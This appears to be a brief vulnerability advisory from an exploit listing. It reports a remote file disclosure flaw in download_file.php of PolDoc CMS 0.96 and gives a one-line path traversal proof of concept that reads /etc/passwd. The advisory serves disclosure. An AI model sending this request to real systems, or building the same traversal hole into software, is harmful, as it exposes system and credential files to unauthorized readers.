PolDoc CMS version 0.96 suffers from a remote file disclosure vulnerability in download_file.php.
20cadee4f4f4d726287051852cf13b2ebc3b826f429f358f6f417d72f49c2b93
PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability
D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272
POC : /download_file.php?filename=../../../../../../../../etc/passwd